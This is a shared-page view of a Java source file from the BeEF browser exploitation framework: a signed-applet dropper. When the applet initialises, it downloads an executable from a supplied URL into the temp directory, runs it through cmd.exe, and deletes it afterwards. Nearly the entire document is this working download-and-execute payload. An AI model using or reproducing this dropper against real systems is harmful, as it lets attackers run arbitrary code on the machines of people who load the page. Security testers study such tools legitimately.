Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
beefproject
GitHub Repository: beefproject/beef
 Path: blob/master/modules/exploits/local_host/signed_applet_dropper/applet/SignedApplet.java
1154 views
1
/*

2
 * Copyright (c) 2006-2025Wade Alcorn - [email protected]

3
 * Browser Exploitation Framework (BeEF) - https://beefproject.com

4
 *

5
 * author: antisnatchor

6
*/

7
import java.applet.*;

8
import java.awt.*;

9
import java.io.*;

10
import java.util.*;

11
import java.net.URL;

12


13
public class SignedApplet extends Applet {

14


15
    public static String debug = "false";

16
    public static String bin_url = "";

17
    public static String bin_path = "";

18
    public static boolean download = false;

19


20
    public void init(){

21
        bin_url = (String)getParameter("url");

22
        String bin_rand_name = Long.toString(Math.abs((new Random()).nextLong()), 36);

23
        bin_path = System.getProperty("java.io.tmpdir") + File.separator + bin_rand_name + ".exe";

24


25
        // grab operating system -> not used atm

26
        // TODO: make the applet compatible also with Linux/OSX

27
        String os = System.getProperty("os.name").toLowerCase();

28
        execute();

29
    }

30


31
    public SignedApplet(){

32
        super();

33
        SecurityManager sm = new SM();

34
        System.setSecurityManager(sm);

35
        return;

36
    }

37


38
    public static boolean download(){

39
        boolean success = false;

40
        try{

41
            URL url = new URL(bin_url);

42
            InputStream is = url.openStream();

43
            BufferedInputStream isbuf = new BufferedInputStream(is);

44
            File bin_out = new File(bin_path);

45
            OutputStream out = new BufferedOutputStream(new FileOutputStream(bin_out));

46
            byte[] buf = new byte[1024];

47
            for (;;){

48
                int bs = isbuf.read(buf);

49
                if (bs <= 0) break;

50
                out.write(buf, 0, bs);

51
            }

52
            out.flush();

53
            out.close();

54
            is.close();

55
            success = true;

56
            return success;

57
        }catch(Exception e){

58
            return success;

59
        }

60
    }

61


62
    public static String execute() {

63
        String result = "";

64
        String command = "";

65
        try{

66
            boolean downloadOk = download();

67
            System.out.println("Download [" + downloadOk + "] - bin_path [" + bin_path + "]");

68
            result = "Download [" + downloadOk + "] - bin_path [" + bin_path + "]";

69


70
            if(downloadOk){

71
                // TODO: make the applet compatible also with Linux/OSX

72
                command = "cmd.exe /c \"" + bin_path + "\"";

73
                Process p = Runtime.getRuntime().exec(command);

74
                p.waitFor();

75
                /// delete dropped binary

76
                new File(bin_path).delete();

77
                result += "\n\nExecution OK.";

78
            }else{

79
                //downloading of dropper failed, catch error..

80
                result = "Download error.";

81
            }

82
        }catch (Exception e) {

83
            result = "Exception!!!: \n";

84
        }

85
        return result;

86
    }

87
}

88


89